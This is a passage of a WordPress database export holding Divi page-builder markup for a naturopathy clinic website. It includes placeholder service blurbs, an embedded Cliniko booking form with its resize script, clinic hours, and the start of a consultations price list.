image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Acupuncture\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.4.8\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\"]<h2>Classes & Workshops</h2>\n<p>Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Vivamus magna justo, lacinia eget consectetur sed.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover_enabled=\"on|hover\" icon_color__hover=\"#000000\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Vestibulum ante\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla quis\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Curabitur nulla\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Quisque velit\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Proin eget\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_text=\"View Calendar\" button_alignment=\"center\" _builder_version=\"4.4.8\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.4.8\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\"]<h2>Don\'t wait to make the shift to a more holistic approach</h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\"]<p>Cras ultricies ligula sed magna dictum porta. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec rutrum congue leo eget malesuada. Nulla porttitor accumsan tincidunt. Curabitur aliquet quam id dui posuere blandit. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia.</p>\n<p>Donec rutrum congue leo eget malesuada. Vivamus suscipit tortor eget felis porttitor volutpat. Pellentesque in ipsum id orci porta dapibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Curabitur aliquet quam id dui posuere blandit. Quisque velit nisi, pretium ut lacinia in elementum.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.4.8\" background_color=\"#f6ddd7\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-24.png\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-46.png\" title_text=\"holistic-healer-46\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.4.8\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" locked=\"off\" sticky_enabled=\"0\" background_enable_image=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\"]<h2>My Practice</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3>Location</h3>\n<p>1234 Divi St. #1000<br /> San Francisco, CA 94220</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3>Make an Appointment</h3>\n<p>Nulla quis lorem ut libero malesuada feugiat</p>[/et_pb_text][et_pb_button button_text=\"Book Now\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3>Open Hours</h3>\n<p>Monday - Friday: 10am - 6pm<br /> Saturday: 3pm - 6pm</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-01 11:39:02','2021-05-01 03:39:02','',28,'https://verde.desidrivers.com.au/?p=90',0,'revision','',0),(29,0,'2025-04-01 19:58:59','2021-04-30 12:05:06',' ','','','publish','closed','closed','','29','','','2025-04-01 19:58:59','2025-04-01 11:58:59','',0,'https://verde.desidrivers.com.au/2021/04/30/29/',1,'nav_menu_item','',0),(30,0,'2025-04-01 19:58:59','2021-04-30 12:05:06',' ','','','publish','closed','closed','','30','','','2025-04-01 19:58:59','2025-04-01 11:58:59','',0,'https://verde.desidrivers.com.au/2021/04/30/30/',2,'nav_menu_item','',0),(38,1,'2021-04-30 12:31:43','2021-04-30 12:31:43','','IMG_20200807_213425_333','','inherit','open','closed','','img_20200807_213425_333','','','2021-04-30 12:31:43','2021-04-30 12:31:43','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/04/IMG_20200807_213425_333.jpg',0,'attachment','image/jpeg',0),(44,1,'2021-04-30 20:53:41','2021-04-30 12:53:41','https://verde.desidrivers.com.au/wp-content/uploads/2021/04/cropped-Standard-01-1.jpg','cropped-Standard-01-1.jpg','','inherit','open','closed','','cropped-standard-01-1-jpg','','','2021-04-30 20:53:41','2021-04-30 12:53:41','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/04/cropped-Standard-01-1.jpg',0,'attachment','image/jpeg',0),(46,1,'2021-04-30 21:00:30','2021-04-30 13:00:30','','header','','inherit','open','closed','','header-2','','','2021-04-30 21:00:30','2021-04-30 13:00:30','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/04/header.png',0,'attachment','image/png',0),(48,1,'2021-04-30 21:09:47','2021-04-30 13:09:47','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"169px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Make a booking</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"600px\" custom_padding=\"0px|||||\"][et_pb_row _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_code _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<iframe id=\'cliniko-83558843\' src=\'https://verde-health.au2.cliniko.com/bookings?practitioner_id=430041868173056552&embedded=true\' frameborder=\'0\' scrolling=\'auto\' width=\'100%\' height=\'1000\' style=\'pointer-events: auto;\'></iframe><!-- [et_pb_line_break_holder] --><script type=\'text/javascript\'><!-- [et_pb_line_break_holder] --> window.addEventListener(\'message\', function handleIFrameMessage (e) {<!-- [et_pb_line_break_holder] --> var clinikoBookings = document.getElementById(\'cliniko-83558843\');<!-- [et_pb_line_break_holder] --> if (typeof e.data !== \'string\') return;<!-- [et_pb_line_break_holder] --> if (e.data.search(\'cliniko-bookings-resize\') > -1) {<!-- [et_pb_line_break_holder] --> var height = Number(e.data.split(\':\')[1]);<!-- [et_pb_line_break_holder] --> clinikoBookings.style.height = height + \'px\';<!-- [et_pb_line_break_holder] --> }<!-- [et_pb_line_break_holder] --> e.data.search(\'cliniko-bookings-page\') > -1 && clinikoBookings.scrollIntoView();<!-- [et_pb_line_break_holder] --> });<!-- [et_pb_line_break_holder] --></script>[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Bookings','','publish','closed','closed','','bookings','','','2021-06-14 14:38:47','2021-06-14 06:38:47','',0,'https://verde.desidrivers.com.au/?page_id=48',0,'page','',0),(52,1,'2021-04-30 21:09:47','2021-04-30 13:09:47','','Bookings','','inherit','closed','closed','','48-revision-v1','','','2021-04-30 21:09:47','2021-04-30 13:09:47','',48,'https://verde.desidrivers.com.au/?p=52',0,'revision','',0),(429,1,'2025-04-01 19:58:39','2025-04-01 11:58:39','<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Consultations</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Choose from face-to-face or online consults</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]\n\n<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments 